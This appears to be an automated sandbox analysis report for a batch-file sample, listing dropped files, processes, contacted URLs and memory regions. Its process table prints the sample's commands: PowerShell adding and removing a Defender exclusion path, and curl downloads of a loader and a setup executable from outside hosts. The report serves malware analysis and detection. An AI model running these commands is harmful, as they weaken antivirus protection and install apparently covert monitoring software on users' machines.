Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
s200.bat
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cp5ps3t.shx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axkxejqb.tu4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbxfodlu.dez.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lovrshse.50o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mg4evzoh.yqm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcjtcfrh.udr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti1wvsf0.eas.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xleo42uf.wfb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s200\l
|
ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\s200\stld2.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s200\stld3.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s200.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\s200'"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\s200'"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 10
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 10
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://swtb-download.spyrix-sfk.com/d
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe77
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe:
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfksock.dll
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
167.114.14.170
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkY
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeHy
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
cdnbaynet.com
|
167.114.14.170
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
167.114.14.170
|
cdnbaynet.com
|
Canada
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
979C8FE000
|
stack
|
page read and write
|
||
|
5B3D0FD000
|
stack
|
page read and write
|
||
|
1C551990000
|
heap
|
page read and write
|
||
|
242373D0000
|
heap
|
page read and write
|
||
|
24237760000
|
heap
|
page read and write
|
||
|
242373E0000
|
heap
|
page read and write
|
||
|
1EB327B0000
|
heap
|
page read and write
|
||
|
1C551A90000
|
heap
|
page read and write
|
||
|
1EB32886000
|
heap
|
page read and write
|
||
|
1EB32883000
|
heap
|
page read and write
|
||
|
1EB32907000
|
heap
|
page read and write
|
||
|
1C586F50000
|
heap
|
page read and write
|
||
|
1C586D88000
|
heap
|
page read and write
|
||
|
223A8400000
|
heap
|
page read and write
|
||
|
1EB328AA000
|
heap
|
page read and write
|
||
|
979C87C000
|
stack
|
page read and write
|
||
|
242375D0000
|
heap
|
page read and write
|
||
|
1EB32881000
|
heap
|
page read and write
|
||
|
134DDF50000
|
heap
|
page read and write
|
||
|
184D2FF000
|
stack
|
page read and write
|
||
|
223A8480000
|
heap
|
page read and write
|
||
|
BDDD1AD000
|
stack
|
page read and write
|
||
|
1EB32790000
|
heap
|
page read and write
|
||
|
223A9EF4000
|
heap
|
page read and write
|
||
|
223A9EF0000
|
heap
|
page read and write
|
||
|
67714FF000
|
stack
|
page read and write
|
||
|
1EB328D4000
|
heap
|
page read and write
|
||
|
979C97E000
|
stack
|
page read and write
|
||
|
242375B0000
|
heap
|
page read and write
|
||
|
1C586D64000
|
heap
|
page read and write
|
||
|
242373E7000
|
heap
|
page read and write
|
||
|
184CF2D000
|
stack
|
page read and write
|
||
|
1C586D20000
|
heap
|
page read and write
|
||
|
1B7C5770000
|
heap
|
page read and write
|
||
|
1EB32882000
|
heap
|
page read and write
|
||
|
134DDF99000
|
heap
|
page read and write
|
||
|
1EB328C0000
|
heap
|
page read and write
|
||
|
24237400000
|
heap
|
page read and write
|
||
|
1EB3288D000
|
heap
|
page read and write
|
||
|
1C551B70000
|
heap
|
page read and write
|
||
|
1EB328BB000
|
heap
|
page read and write
|
||
|
134DDF90000
|
heap
|
page read and write
|
||
|
1EB327D0000
|
remote allocation
|
page read and write
|
||
|
67712FD000
|
stack
|
page read and write
|
||
|
134DDF70000
|
heap
|
page read and write
|
||
|
1EB32907000
|
heap
|
page read and write
|
||
|
1EB327D0000
|
remote allocation
|
page read and write
|
||
|
1B7C3BD0000
|
heap
|
page read and write
|
||
|
134DDFA3000
|
heap
|
page read and write
|
||
|
134DE140000
|
heap
|
page read and write
|
||
|
A75B2FF000
|
stack
|
page read and write
|
||
|
BDDD4FF000
|
stack
|
page read and write
|
||
|
1C586D80000
|
heap
|
page read and write
|
||
|
1C551DE0000
|
heap
|
page read and write
|
||
|
24237764000
|
heap
|
page read and write
|
||
|
134DE144000
|
heap
|
page read and write
|
||
|
1EB328ED000
|
heap
|
page read and write
|
||
|
5B3D2FE000
|
stack
|
page read and write
|
||
|
5B3D1FE000
|
stack
|
page read and write
|
||
|
1C551A70000
|
heap
|
page read and write
|
||
|
67713FF000
|
stack
|
page read and write
|
||
|
1EB328BD000
|
heap
|
page read and write
|
||
|
1EB3288E000
|
heap
|
page read and write
|
||
|
5DE9FBD000
|
stack
|
page read and write
|
||
|
1B7C5590000
|
heap
|
page read and write
|
||
|
1EB3288D000
|
heap
|
page read and write
|
||
|
A75B27F000
|
stack
|
page read and write
|
||
|
1EB328ED000
|
heap
|
page read and write
|
||
|
1EB32886000
|
heap
|
page read and write
|
||
|
1B7C3C10000
|
heap
|
page read and write
|
||
|
1B7C3BE0000
|
heap
|
page read and write
|
||
|
1EB32870000
|
heap
|
page read and write
|
||
|
134DDFAE000
|
heap
|
page read and write
|
||
|
223A83B0000
|
heap
|
page read and write
|
||
|
1EB328ED000
|
heap
|
page read and write
|
||
|
1B7C5774000
|
heap
|
page read and write
|
||
|
1EB32878000
|
heap
|
page read and write
|
||
|
1C586D60000
|
heap
|
page read and write
|
||
|
184D3FF000
|
stack
|
page read and write
|
||
|
5DEA27E000
|
stack
|
page read and write
|
||
|
1C551B78000
|
heap
|
page read and write
|
||
|
1EB32830000
|
heap
|
page read and write
|
||
|
1EB328AA000
|
heap
|
page read and write
|
||
|
A75AFAC000
|
stack
|
page read and write
|
||
|
1C551DE5000
|
heap
|
page read and write
|
||
|
1EB328AA000
|
heap
|
page read and write
|
||
|
223A83C0000
|
heap
|
page read and write
|
||
|
BDDD5FF000
|
stack
|
page read and write
|
||
|
1B7C3C18000
|
heap
|
page read and write
|
||
|
223A8488000
|
heap
|
page read and write
|
||
|
1EB3288D000
|
heap
|
page read and write
|
||
|
1EB328AA000
|
heap
|
page read and write
|
||
|
1EB328B3000
|
heap
|
page read and write
|
||
|
134DDE70000
|
heap
|
page read and write
|
||
|
1EB3288D000
|
heap
|
page read and write
|
||
|
1EB32907000
|
heap
|
page read and write
|
||
|
1EB328D4000
|
heap
|
page read and write
|
||
|
1EB327D0000
|
remote allocation
|
page read and write
|
||
|
1C586D30000
|
heap
|
page read and write
|
||
|
5DEA2FE000
|
stack
|
page read and write
|
||
|
1EB326B0000
|
heap
|
page read and write
|
There are 91 hidden memdumps, click here to show them.